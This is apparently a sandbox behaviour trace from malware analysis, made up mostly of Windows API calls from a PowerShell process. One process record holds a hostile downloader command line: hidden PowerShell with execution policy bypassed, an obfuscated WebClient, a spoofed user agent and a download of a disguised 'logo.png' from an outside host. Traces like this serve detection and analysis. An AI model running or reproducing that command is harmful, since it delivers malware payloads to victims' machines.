	[0230.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0234.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0234.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0234.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0234.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.863] VirtualQuery (in: lpAddress=0x1bba20, lpBuffer=0x1bc8e0, dwLength=0x30 | out: lpBuffer=0x1bc8e0*(BaseAddress=0x1bb000, AllocationBase=0x140000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0245.868] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0245.868] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0245.868] CoTaskMemFree (pv=0x2b5590) 
	[0245.877] VirtualQuery (in: lpAddress=0x1bba20, lpBuffer=0x1bc8e0, dwLength=0x30 | out: lpBuffer=0x1bc8e0*(BaseAddress=0x1bb000, AllocationBase=0x140000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0246.188] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0246.188] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0246.188] CoTaskMemFree (pv=0x2b5590) 
	[0246.192] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0246.192] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0246.192] CoTaskMemFree (pv=0x2b5590) 
	[0246.194] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0246.194] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0246.194] CoTaskMemFree (pv=0x2b5590) 
	[0246.201] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0246.201] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0246.201] CoTaskMemFree (pv=0x2b5590) 
	[0246.206] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0246.206] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0246.206] CoTaskMemFree (pv=0x2b5590) 
	[0246.208] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0246.208] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0246.208] CoTaskMemFree (pv=0x2b5590) 
	[0246.213] VirtualQuery (in: lpAddress=0x1bba20, lpBuffer=0x1bc8e0, dwLength=0x30 | out: lpBuffer=0x1bc8e0*(BaseAddress=0x1bb000, AllocationBase=0x140000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0246.217] VirtualQuery (in: lpAddress=0x1bba20, lpBuffer=0x1bc8e0, dwLength=0x30 | out: lpBuffer=0x1bc8e0*(BaseAddress=0x1bb000, AllocationBase=0x140000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0249.822] VirtualQuery (in: lpAddress=0x1bba20, lpBuffer=0x1bc8e0, dwLength=0x30 | out: lpBuffer=0x1bc8e0*(BaseAddress=0x1bb000, AllocationBase=0x140000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0250.332] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0250.332] CoTaskMemFree (pv=0x2b5590) 
	[0252.125] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2b59d0
	[0258.797] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5bf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0258.798] CoTaskMemFree (pv=0x2b5bf0) 
	[0259.061] CoTaskMemAlloc (cb=0x104) returned 0x2b5bf0
	[0259.061] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5bf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0259.061] CoTaskMemFree (pv=0x2b5bf0) 
	[0259.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bc5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74

Thread:
	id = 322
	os_tid = 0xc74


Thread:
	id = 324
	os_tid = 0xc84


Thread:
	id = 329
	os_tid = 0xca0


Thread:
	id = 331
	os_tid = 0xca8


Thread:
	id = 335
	os_tid = 0xcc8


Thread:
	id = 336
	os_tid = 0xccc

	[0124.023] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0150.216] RegCloseKey (hKey=0x330) returned 0x0
	[0150.216] LocalFree (hMem=0x2638f0) returned 0x0
	[0150.217] CloseHandle (hObject=0x324) returned 1
	[0150.217] CloseHandle (hObject=0x13) returned 1
	[0150.217] CloseHandle (hObject=0xf) returned 1
	[0150.218] RegCloseKey (hKey=0x310) returned 0x0
	[0150.218] RegCloseKey (hKey=0x30c) returned 0x0
	[0150.218] RegCloseKey (hKey=0x308) returned 0x0
	[0150.218] LocalFree (hMem=0x2638c0) returned 0x0
	[0174.827] RegCloseKey (hKey=0x1d4) returned 0x0
	[0212.627] RegCloseKey (hKey=0x360) returned 0x0
	[0212.627] RegCloseKey (hKey=0x35c) returned 0x0
	[0212.627] RegCloseKey (hKey=0x358) returned 0x0
	[0212.628] RegCloseKey (hKey=0x354) returned 0x0
	[0212.628] RegCloseKey (hKey=0x350) returned 0x0
	[0212.628] RegCloseKey (hKey=0x374) returned 0x0
	[0212.628] RegCloseKey (hKey=0x340) returned 0x0
	[0212.629] RegCloseKey (hKey=0x33c) returned 0x0
	[0212.629] RegCloseKey (hKey=0x338) returned 0x0
	[0212.629] RegCloseKey (hKey=0x334) returned 0x0
	[0212.629] RegCloseKey (hKey=0x330) returned 0x0
	[0212.630] RegCloseKey (hKey=0x324) returned 0x0
	[0212.630] RegCloseKey (hKey=0x310) returned 0x0
	[0212.630] RegCloseKey (hKey=0x370) returned 0x0
	[0212.630] RegCloseKey (hKey=0x308) returned 0x0
	[0212.630] RegCloseKey (hKey=0x2e8) returned 0x0
	[0212.631] RegCloseKey (hKey=0x34c) returned 0x0
	[0212.631] RegCloseKey (hKey=0x378) returned 0x0
	[0212.631] RegCloseKey (hKey=0x368) returned 0x0
	[0212.631] RegCloseKey (hKey=0x364) returned 0x0
	[0252.640] RegCloseKey (hKey=0x324) returned 0x0
	[0252.640] RegCloseKey (hKey=0x310) returned 0x0
	[0252.640] RegCloseKey (hKey=0x370) returned 0x0
	[0252.640] RegCloseKey (hKey=0x308) returned 0x0
	[0252.640] RegCloseKey (hKey=0x2e8) returned 0x0
	[0252.641] RegCloseKey (hKey=0x36c) returned 0x0
	[0252.641] RegCloseKey (hKey=0x330) returned 0x0
	[0252.641] RegCloseKey (hKey=0x378) returned 0x0
	[0252.641] RegCloseKey (hKey=0x368) returned 0x0
	[0252.642] RegCloseKey (hKey=0x364) returned 0x0

Process:
	id = "41"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x2e5dc000"
	os_pid = "0xc5c"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "39"
	os_parent_pid = "0xc04"
	cmd_line = "PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 319
	os_tid = 0xc60

	[0124.297] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
